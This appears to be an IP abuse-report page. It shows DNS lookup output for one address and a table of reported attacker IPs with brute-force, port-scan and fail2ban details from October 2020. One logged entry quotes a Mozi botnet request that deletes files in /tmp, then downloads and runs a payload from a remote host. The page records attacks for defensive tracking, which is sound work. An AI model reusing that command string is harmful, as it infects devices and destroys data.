City: unknown
Region: unknown
Country: United States of America (the)
Internet Service Provider: unknown
Hostname: unknown
Organization: unknown
Usage Type: unknown
b
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 16.252.29.212
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 29604
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;16.252.29.212. IN A
;; AUTHORITY SECTION:
. 30 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2025022500 1800 900 604800 86400
;; Query time: 16 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Wed Feb 26 00:32:56 CST 2025
;; MSG SIZE rcvd: 106
Host 212.29.252.16.in-addr.arpa not found: 2(SERVFAIL)
server can't find 16.252.29.212.in-addr.arpa: SERVFAIL
IP | Type | Details | Datetime |
---|---|---|---|
82.207.25.19 | attack | Brute forcing email accounts |
2020-10-07 07:37:07 |
200.199.227.195 | attack | $f2bV_matches |
2020-10-07 12:06:30 |
120.92.107.97 | attackbots | Automatic report - Banned IP Access |
2020-10-07 07:51:36 |
62.210.246.49 | attackspambots | Fail2Ban Ban Triggered |
2020-10-07 07:49:15 |
115.59.37.53 | attackbots | 115.59.37.53 - - [05/Oct/2020:21:40:41 +0100] 80 "GET /shell?cd+/tmp;rm+-rf+*;wget+http://115.59.37.53:39826/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 403 824 "-" "Hello, world" ... |
2020-10-07 07:42:17 |
89.207.91.29 | attack | Unauthorized connection attempt from IP address 89.207.91.29 on Port 445(SMB) |
2020-10-07 12:03:53 |
95.219.201.231 | attackbotsspam | Icarus honeypot on github |
2020-10-07 07:54:05 |
154.120.230.250 | attackbotsspam | Unauthorized connection attempt from IP address 154.120.230.250 on Port 445(SMB) |
2020-10-07 12:07:28 |
45.230.80.13 | attackspambots | Autoban 45.230.80.13 AUTH/CONNECT |
2020-10-07 12:08:22 |
213.14.112.92 | attackbots | $f2bV_matches |
2020-10-07 07:43:34 |
103.130.108.9 | attackspambots | Bruteforce detected by fail2ban |
2020-10-07 07:56:39 |
141.98.9.33 | attackspambots | $f2bV_matches |
2020-10-07 12:04:44 |
154.8.144.203 | attackspambots | Oct 6 18:39:53 ny01 sshd[30415]: Failed password for root from 154.8.144.203 port 52390 ssh2 Oct 6 18:41:40 ny01 sshd[30628]: Failed password for root from 154.8.144.203 port 47342 ssh2 |
2020-10-07 07:39:02 |
98.214.86.3 | attackbotsspam | Port scan on 1 port(s): 22 |
2020-10-07 07:33:11 |
113.160.196.89 | attackbots | 20/10/5@16:40:23: FAIL: Alarm-Network address from=113.160.196.89 20/10/5@16:40:23: FAIL: Alarm-Network address from=113.160.196.89 ... |
2020-10-07 07:49:33 |